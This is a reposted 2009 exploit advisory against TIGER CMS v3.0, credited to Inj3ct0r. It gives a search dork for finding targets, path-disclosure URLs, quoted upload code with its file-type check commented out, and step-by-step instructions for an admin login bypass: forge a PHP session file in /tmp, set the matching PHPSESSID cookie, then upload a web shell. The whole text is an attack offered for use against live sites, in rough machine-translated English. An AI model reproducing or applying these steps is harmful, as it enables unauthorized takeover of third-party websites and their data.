Home / os / win10

tigercms-bypass.txt

Posted on 26 August 2009

==========================================
TIGER CMS <= v3.0 Bypass admin / get shell
==========================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /'             __  /'__`        / \__  /'__`                   0
0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           1
1  /_/  /' _ ` / /_/_\_<_  /'___  /    /`'__          0
0       / /    /   / \__/  \_  \_   /           1
1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           0
0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           1
1                   \____/ >> Exploit database separated by exploit   0
0                   /___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com


Product : TIGER CMS
Vesrion : v3.0
Site : http://tigercms.com/
Dork:"Powered by TIGER CMS v3.0"


Path Disclosure

Sample : http://bobruisk.name/admin/engine/modules/uploads/

Usage:


http://site.com/path/admin/engine/modules/[module_name]

Standard modules, which are suitable for this purpose:

uploads
content
links
metatags
news
pass
templates

Filling an arbitrary file
Unclear why, but the fault of all - 2  default lines.

PHP code:

$type = strtolower(substr($filename, 1 + strrpos($filename, ".")));
//$types_ok = array("jpg", "bmp", "gif", "png");
//if(!in_array($type, $types_ok)) $Validate->Locate("javascript:window.close();", 0, 1, "Íåâåðíûé ôîðìàò ôàéëà.");

$new_name = 'tiger-'.time().'.'.$type;
$a = copy($file, "../uploads/".$new_name);
$path_all = getenv("SERVER_NAME");

Example:

http://site.com/path/admin/?task=uploads&sub_task=add


Bypass authentication to the admin.

Need:

Shell on the neighboring site
Access to write to the / tmp

Vulnerable code:

admin/login/login2.php

PHP code:

$_SESSION['user_id_admin'] = $id_admin;
$Admins->SuccessAuth($login);


For a successful login, we will need to login admin. Venture to suggest that it is "admin"

Represents sesiyu:

Name: sess_0526152ea0fed5dbbfca86639e0f6fa7

Contents:

user_id_admin | s: 1: "1";

Keeping in / tmp
Do not forget to right 777!
Next forges cookies in your browser:

PHPSESSID=0526152ea0fed5dbbfca86639e0f6fa7


Go:

http://site.com/path/admin/, successfully passed authentication pour shell as described above.


ThE End =]  Visit my proj3ct  :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net

# ~  - [ [ : Inj3ct0r : ] ]

 

TOP

Malware :

Exploits :